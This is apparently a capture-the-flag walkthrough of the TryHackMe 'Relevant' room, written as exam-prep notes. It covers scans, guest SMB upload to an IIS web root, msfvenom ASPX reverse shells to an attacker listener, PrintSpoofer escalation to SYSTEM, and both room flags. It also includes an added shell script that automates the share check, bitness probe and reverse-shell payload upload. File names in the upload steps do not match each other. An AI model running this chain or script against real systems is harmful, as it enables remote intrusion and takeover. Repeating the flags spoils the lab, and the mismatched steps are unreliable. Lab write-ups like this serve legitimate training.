Hi, everyone. As I prepare for the PJPT, I've been doing my best to write clear and concise notes that are easy to follow. This matters if you have to reset your attack box or the target machine. In my case, I've been experiencing a few crashes, one of which happened while I was working on THM's Relevant box. Luckily, I was taking notes, and it only took me 3 minutes to get back in after the machine was back up and running. So here's what my standard notes look like while running through this room:
Relevant
1. Rustscan
root@ip-10-10-180-97:~# rustscan -g -a 10.10.66.86 -u 5000
10.10.66.86 -> [80,135,139,445,3389,5985,49663,49666,49667]
2. NMAP Scan
root@ip-10-10-180-97:~# nmap -sVC -p 80,135,139,445,3389,5985,49663,49666,49667 10.10.66.86
Starting Nmap 7.60 ( https://nmap.org ) at 2024-03-11 12:46 GMT
Nmap scan report for ip-10-10-66-86.eu-west-1.compute.internal (10.10.66.86)
Host is up (0.00043s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2024-03-10T12:40:11
|_Not valid after:  2024-09-09T12:40:11
|_ssl-date: 2024-03-11T12:47:55+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 02:CA:17:A3:3B:49 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: RELEVANT, NetBIOS user: <unknown>, NetBIOS MAC: 02:ca:17:a3:3b:49 (unknown)
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-11T05:47:55-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-03-11 12:47:56
|_  start_date: 2024-03-11 12:40:12

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.99 seconds

=> Windows Server 2016 (build 14393), two separate IIS sites (80 and 49663), SMB where the guest account was accepted and signing is not required, plus WinRM (5985) and RDP (3389). SMB and the second IIS site are the places to dig first.
3. SMB Enumeration
root@ip-10-10-180-97:~# smbclient -L \\\\10.10.66.86
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk
root@ip-10-10-180-97:~# smbclient \\\\10.10.66.86\\nt4wrksv
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 22:46:04 2020
  ..                                  D        0  Sat Jul 25 22:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 16:15:33 2020

                7735807 blocks of size 4096. 4949412 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> put test.txt
putting file test.txt as \test.txt (0.7 kb/s) (average 0.7 kb/s)

=> The nt4wrksv share is readable and writable without valid credentials: "root" is not an account on the target, so the server mapped the session to guest (exactly what nmap's smb-security-mode reported). We can pull passwords.txt and, more importantly, place our own files on the host via SMB.
4. WebApp Enumeration
root@ip-10-10-180-97:~# gobuster dir -u http://10.10.66.86:49663 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.66.86:49663
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/03/11 12:56:08 Starting gobuster
===============================================================
/aspnet_client (Status: 301)
===============================================================
2024/03/11 12:58:27 Finished
===============================================================

Gobuster only found /aspnet_client, but the share name itself is worth trying as a path. Browsing to http://10.10.66.86:49663/nt4wrksv and then http://10.10.66.86:49663/nt4wrksv/passwords.txt both work, and the second serves the same file we pulled over SMB.
=> The IIS site on 49663 is serving the nt4wrksv share directory. Anything we put on the share via SMB becomes reachable over HTTP, and IIS will execute a .aspx file it finds there, so we can upload an ASPX web shell to the share and detonate it with a single request to that URL.
5. Creating a payload & Starting Listener
root@ip-10-10-180-97:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.180.97 LPORT=8080 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2717 bytes
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (8.4 kb/s) (average 7.9 kb/s)
root@ip-10-10-180-97:~# nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
6. Detonated but Nothing Happened…
Requesting shell.aspx produced no connection back. After some research, the architecture turned out to be the reason: windows/shell_reverse_tcp is an x86 payload (msfvenom chose x86 because no arch was given), but this IIS worker process (w3wp.exe on 64-bit Windows Server 2016) is 64-bit, so the x86 shellcode never runs correctly inside it. The fix is the x64 variant of the same payload.
root@ip-10-10-180-97:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.180.97 LPORT=8080 -f aspx > shell2.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3387 bytes
smb: \> put shell2.aspx
putting file shell.aspx as \shell.aspx (8.4 kb/s) (average 7.9 kb/s)
7. Round 2
root@ip-10-10-180-97:~# curl http://10.10.66.86:49663/nt4wrksv/shell3.aspx

(in the nc window)
Listening on [0.0.0.0] (family 0, port 8080)
Connection from ip-10-10-66-86.eu-west-1.compute.internal 49883 received!
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
=> I'm in
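Steps 3 to 7 are really one procedure: confirm the writable share is the IIS web root, find out what bitness the worker process runs, and only then build the payload. The script below is an added example I wrote for these notes (not something from the room, from Metasploit or from smbclient) that automates those checks so the x86/x64 mistake is caught before the first upload. It assumes the values from this room (10.10.66.86, share nt4wrksv, IIS on 49663), a null-session writable share, and that LHOST/LPORT are exported by the operator; the probe page and helper names are my own.

```shell
#!/bin/sh
# Added example, not from the original notes: confirm that a writable SMB share
# is the IIS web root, probe the worker-process bitness, and build the matching
# msfvenom payload. TARGET/SHARE/WEBPORT default to the values from this room;
# LHOST and LPORT are assumed to be exported by the operator.
set -eu

TARGET="${TARGET:-10.10.66.86}"
SHARE="${SHARE:-nt4wrksv}"
WEBPORT="${WEBPORT:-49663}"

# URL at which a file dropped on the share should appear if the share is the web root.
share_to_url() {
  printf 'http://%s:%s/%s/%s\n' "$1" "$2" "$3" "$4"
}

# msfvenom payload name for the bitness (32 or 64) the probe page reports.
pick_payload() {
  case "$1" in
    64) echo windows/x64/shell_reverse_tcp ;;
    32) echo windows/shell_reverse_tcp ;;
    *)  echo "unknown bitness: $1" >&2; return 1 ;;
  esac
}

# Inline ASPX probe: IntPtr.Size is 8 in a 64-bit w3wp.exe and 4 in a 32-bit one,
# so the response body is "64" or "32". This reflects the application pool, not
# the OS, which matters because a 64-bit OS can still run a 32-bit app pool.
write_probe() {
  cat > "$1" <<'EOF'
<%@ Page Language="C#" %><% Response.Write(IntPtr.Size * 8); %>
EOF
}

# Upload with a null session (-N): the share allowed guest writes in this room.
smb_put() {
  smbclient "//$TARGET/$SHARE" -N -c "put $1 $1"
}

# Fetch a file from the share over HTTP and print the body.
web_get() {
  curl -fsS "$(share_to_url "$TARGET" "$WEBPORT" "$SHARE" "$1")"
}

main() {
  # 1. Marker file: same content back over HTTP => share directory is the web root.
  marker="probe_$$.txt"
  printf '%s\n' "$marker" > "$marker"
  smb_put "$marker"
  if [ "$(web_get "$marker")" = "$marker" ]; then
    echo "[+] $SHARE is served at $(share_to_url "$TARGET" "$WEBPORT" "$SHARE" '')"
  else
    echo "[-] $SHARE is not reachable over HTTP on port $WEBPORT" >&2
    exit 1
  fi

  # 2. Bitness probe, executed by the real worker process.
  probe="arch_$$.aspx"
  write_probe "$probe"
  smb_put "$probe"
  bits=$(web_get "$probe" | tr -dc '0-9')
  echo "[+] IIS worker process is ${bits}-bit"

  # 3. Build and upload the payload that matches what the probe reported.
  payload=$(pick_payload "$bits")
  msfvenom -p "$payload" LHOST="$LHOST" LPORT="$LPORT" -f aspx > shell.aspx
  smb_put shell.aspx
  echo "[+] shell.aspx uploaded; start 'nc -lvnp $LPORT', then request $(share_to_url "$TARGET" "$WEBPORT" "$SHARE" shell.aspx)"
}

# Only touch the network when asked, so the helpers can be sourced and reused.
if [ "${RUN_PROBE:-0}" = 1 ]; then
  main
fi
```

Run it as `RUN_PROBE=1 LHOST=10.10.180.97 LPORT=8080 sh probe.sh`. Checking the bitness through a page that IIS actually executes, rather than from the OS version in the nmap output, is the point: it is the application pool, not the host, that decides whether x86 or x64 shellcode will run.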
8. Find User Flag
C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
9. Windows PrivEsc
C:\Users>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege looks interesting. It is Enabled, which is normal for the IIS worker's application pool identity we are running as (the shell landed in c:\windows\system32\inetsrv). An account holding it can impersonate any client that connects to a named pipe it owns, so if a SYSTEM process can be coerced into connecting we get a SYSTEM token. The two things to confirm before reaching for a tool are that the privilege shows Enabled (it does) and, for the Print Spooler coercion below, that the Spooler service is running (sc query spooler).
10. Box crashed… Rebooting
Connection from ip-10-10-134-96.eu-west-1.compute.internal 49689 received!
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
=> I'm back
11. PrintSpoofer for SeImpersonatePrivilege (PrivEsc)
root@ip-10-10-180-97:~# wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Saving to: 'PrintSpoofer64.exe'
PrintSpoofer64.exe  100%[=======================>]  26.50K  --.-KB/s    in 0.001s
2024-03-11 13:50:53 (21.9 MB/s) - 'PrintSpoofer64.exe' saved [27136/27136]
smb: \> put PrintSpoofer64.exe
putting file PrintSpoofer64.exe as \PrintSpoofer64.exe (13249.4 kb/s) (average 7451.9 kb/s)
=> PrintSpoofer64.exe is the 64-bit build, which matches the 64-bit process we learned about the hard way in step 6; the same release also ships PrintSpoofer32.exe for 32-bit targets.
12. Execute PrintSpoofer
Share file path ⇒ c:\inetpub\wwwroot\nt4wrksv (the share is the IIS virtual directory, which is why SMB uploads were reachable over HTTP)
c:\windows\system32\inetsrv>cd c:/inetpub/wwwroot/nt4wrksv

c:\inetpub\wwwroot\nt4wrksv>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of c:\inetpub\wwwroot\nt4wrksv

03/11/2024  06:51 AM    <DIR>          .
03/11/2024  06:51 AM    <DIR>          ..
07/25/2020  08:15 AM                98 passwords.txt
03/11/2024  06:51 AM            27,136 PrintSpoofer64.exe
03/11/2024  06:48 AM             3,387 shell3.aspx
               3 File(s)         30,621 bytes
               2 Dir(s)  20,272,066,560 bytes free

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell.exe
PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
=> -c is the command to run with the stolen token; -i keeps that process attached to the current console, which is what you want from a reverse shell (without it the new process would spawn detached and you would never see its output).
13. Find Root Flag
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> ls
ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/25/2020   8:25 AM             35 root.txt

PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}